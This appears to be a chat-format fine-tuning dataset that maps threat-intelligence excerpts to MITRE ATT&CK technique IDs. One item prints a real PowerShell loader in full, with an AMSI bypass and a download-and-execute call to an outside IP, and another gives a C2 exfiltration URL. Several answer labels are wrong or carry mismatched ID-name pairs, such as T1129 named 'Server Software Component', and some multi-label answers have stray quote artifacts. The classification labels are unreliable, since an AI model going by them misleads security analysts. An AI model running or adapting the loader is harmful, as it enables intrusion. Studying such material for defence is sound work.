- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "bypassed User Access Control (UAC)."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leverages legitimate social networking sites and cloud platforms (Twitter, Yandex, and Mediafire) for command and control communications."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can communicate to its C2 over HTTP and HTTPS if directed."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor's dispatcher can establish persistence via adding a Registry key with a logon script \"HKEY_CURRENT_USER\\Environment \"UserInitMprLogonScript\" \"."
- },
- {
- "role": "assistant",
- "content": "T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Night Dragon sent spearphishing emails containing links to compromised websites where malware was downloaded."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The VB.NET variant then gathers system information and running processes like other Zebrocy variants by running the following commands: systeminfo & tasklist The URL used to send the system information, running processes and a screenshot to the C2 server is: hxxp://109.248.148[.]42/agr-enum/progress-inform/cube.php?res=[serial number] The VB.NET variant of Zebrocy uses an HTTP POST request to the URL above to transmit the gathered data, of which is included within the HTTP POST data that is structured as follows (notice the spaces before and after ampersand “&”): data=[system information and running processes] & arg=[screenshot in BMP format] C# Zebrocy Variant The C# variant of Zebrocy is similar to other variants in functionality, but also has several unique attributes that are worth discussing"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1057 - Process Discovery', 'T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this instance a spear phishing email was used containing a lure designed to socially engineer and entice the victim to executing a malicious attachment"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic has used HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We identified that even though the downloaded installation executable was signed using a valid digital signature issued to Piriform, CCleaner was not the only application that came with the download. During the installation of CCleaner 5.33, the 32-bit CCleaner binary that was included also contained a malicious payload that featured a Domain Generation Algorithm (DGA) as well as hardcoded Command and Control (C2) functionality. We confirmed that this malicious version of CCleaner was being hosted directly on CCleaner's download server as recently as September 11, 2017. In reviewing the Version History page on the CCleaner download site, it appears that the affected version (5.33) was released on August 15, 2017. On September 12, 2017 version 5.34 was released. The version containing the malicious payload (5.33) was being distributed between these dates. This version was signed using a valid certificate that was issued to Piriform Ltd by Symantec and is valid through 10/10/2018. Piriform was the company that Avast recently acquired and was the original company who developed the CCleaner software application. This second sample was also signed using a valid digital certificate, however the signing timestamp was approximately 15 minutes after the initial sample was signed. It is also important to note that while previous versions of the CCleaner installer are currently still available on the download server, the version containing the malicious payloads has been removed and is no longer available"
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KEYMARBLE can obtain a list of running processes on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In earlier attacks, the group used malicious Microsoft Word documents to infect victims, with compromised websites being added to the mix as a more recent attack vector"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses port 8000 and 443 for C2."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record (MBR) to ensure that the malware will persist even if a victim machine shuts down."
- },
- {
- "role": "assistant",
- "content": "T1542.003 - Bootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can use WMI to deliver a payload to a remote host."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "T9000 uses the Skype API to record audio and video calls. It writes encrypted data to \"%APPDATA%\\Intel\\Skype\"."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture', 'T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command_Update_Server: This command passes the string “Gh0st Update” to the malware sample before running the sample again. When the sample restarts, it detects the “Gh0st Update” command line arg, and connects to the server in order to update the sample. Command_Clean_Event: This command locates and deletes all of the event logs on the system"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1059 - Command and Scripting Interpreter', 'T1070 - Indicator Removal on Host', 'T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot can modify registry entries."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda used custom batch scripts to collect files automatically from a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used CVE-2015-4902 to bypass security features."
- },
- {
- "role": "assistant",
- "content": "T1211 - Exploitation for Defense Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Writes itself to %AppData%\\Microsoft\\Word\\log.ps1 2) Sets up persistence for this file, using a run key. 3) Adds a registry key so that future powershell.exe instances are spawned off-screen by default – this trick is explained here. 6) Removes all registry entries that are left behind during the dropper process"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1564.003 - Hide Artifacts: Hidden Window', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1/12/14 3/5/14 127.0.0.1 N/A 3/5/14 3/31/14 103.24.0.142 Hong Kong 3/31/14 10/27/14 103.24.1.54 Hong Kong 10/27/14 11/9/14 127.0.0.1 N/A 11/9/14 5/25/15 127.0.0.3 N/A 5/25/15 Current as of this publication 127.0.0.1 N/A Table 5"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "63 64 ku64.dll ku32.dll Keylogger & clipboard monitor"
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes. DLL side loading has been used to maintain persistence on the compromised system. Source: Dell SecureWorks) - ChinaChopper web shell — A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. The server-side component provides a simple graphical user interface for threat actors interacting with web shells. TG-3390 has used additional web shells containing similarly formatted passwords"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the registry value is created, the attackers simply wait for the occasional execution of dllhost.exe, which might happen naturally on a system. This execution triggers a process launch of wscript.exe configured to run the VBScript file dropped in step #4"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1546.012 - Event Triggered Execution: Image File Execution Options Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ServHelper has created a new user and added it to the \"Remote Desktop Users\" and \"Administrators\" groups."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TSCookie has the ability to decrypt, load, and execute a DLL and its resources."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to capture video from a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA has the capability to enumerate services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nebulae has the capability to upload collected files to C2."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater maintains persistence on victim networks through side-loading dlls to trick legitimate programs into running malware."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 1: SpeakUp’s Victim Distribution Figure 2: SpeakUp’s propagation rate per day Infection Vector The initial infection vector is targeting the recently reported vulnerability in ThinkPHP and uses command injection techniques for uploading a PHP shell that serves and executes a Perl backdoor"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process"
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Capable of stealing documents sent to the printer queue. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies"
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon can switch to an alternate C2 domain when a particular date has been reached."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Timezone Check The Trojan check to see if the system is configured (“DaylightName”) with one of the following time zones: Arabic Daylight Time (UTC+3) Arab Daylight Time (UTC+3) Arabian Daylight Time (UTC+4) Middle East Daylight Time (UTC+2) Iran Daylight Time (UTC+3.5) Human Interaction Check Before executing its functional code, the Trojan presents a dialog box with the following line of code: Interaction.MsgBox(encodedStringClass.return_user32_bogus_errorcode_(3), MsgBoxStyle.Critical, null); This dialog box displays An error occurred while processing user32.dll!, which the user must click the ok button for the Trojan to run its functional code"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "That new instance of RegAsm.exe is then responsible for handling the brunt of the malicious activity (data harvesting, exfiltration). We can also see frequent use of ‘Process Hollowing’ as an injection method. Process Hollowing allows for the creation or manipulation of processes through which sections of memory are unmapped (hollowed) with that space then being reallocated with the desired malicious code"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volatile Cedar has used DirBuster and GoBuster to brute force web directories and DNS subdomains."
- },
- {
- "role": "assistant",
- "content": "T1595.003 - Active Scanning: Wordlist Scanning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy has a module to clear event logs with PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CaddyWiper can enumerate all files and directories on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remcos has a command for keylogging."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "adbupd contains a copy of the OpenSSL library to encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains code to open and copy data from the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used links in e-mail to steal account information."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT-C-36 obtained and used a modified variant of Imminent Monitor."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to inject the \"LoadLibrary\" call template DLL into running processes."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An APT28 backdoor may collect the entire contents of an inserted USB device."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The JavaScript component is the first stage of the attack and can deploy other malware such as a C# spy component, Golden Chickens components or several Python-based tools. The name Evilnum was given to the C# component by other researchers in the past, but the JS component also has been referred to as Evilnum. We have named the group Evilnum as that is the name of their flagship malware, and we’ll refer to the various malware pieces as components"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It looks like GrowlHelper creates an executable named Software Update Check when it thinks it’s online. I was pretty excited when I first found this, but quickly realized it just drops a copy of itself with a different name"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors used the `systeminfo` command to gather details about a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 spear phishing campaigns have included malicious Word documents with DDE execution."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KGH_SPY has used encrypted strings in its installer."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Get-ProcessTokenPrivilege Privesc-PowerUp module can enumerate privileges for a given process."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The PowerShell command decodes to the following:$command = 'WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACAAIAAgACAAdAByAHkAewAgAAoAIAAgACAAIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgAgACAAIAAgAH0AYwBhAHQAYwBoAHsAfQAKACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAzADkALgA1ADkALgA0ADYALgAxADUANAA6ADMANAA4ADUALwBJAE0AbwA4AG8AbwBzAGkAZQBWAGEAaQAnACkAOwAKACAAIAAgACAA' if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') { $exec = $Env:windir + '\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded ' + $command IEX $exec } else { $exec = [System.Convert]::FromBase64String($command) $exec = [Text.Encoding]::Unicode.GetString($exec) IEX $exec }The script above checks the system architecture to determine if it is an x64 machine and attempts to execute a base64 encoded command that decodes to the following:[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; try{ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) }catch{} IEX (New-Object Net.WebClient).DownloadString('http:// 139.59.46[.]154:3485 /IMo8oosieVai');This decoded PowerShell script attempts to download and execute a file using HTTP from the URL “hxxp:// 139.59.46[.]154:3485 /IMo8oosieVai”"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload uses WMI queries and checks running processes for evidence that the script may be executing within an analysis environment"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zox has the ability to upload files from a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These websites hosted malware that would be side-loaded with a legitimate signed executable. These tactics are becoming increasingly common by malware authors in order to evade security products and controls. Two variants of the malware employed by C0d0so0 were discovered—one that used HTTP for command and control (C2) communications, and one that used a custom network protocol over port 22"
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage service to act as the CnC server. The communication occurs via HTTPS over port 443"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device."
- },
- {
- "role": "assistant",
- "content": "T1052.001 - Exfiltration over USB"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has used HTTP and HTTPS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CreepyUp: uploads any file to the C&C server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
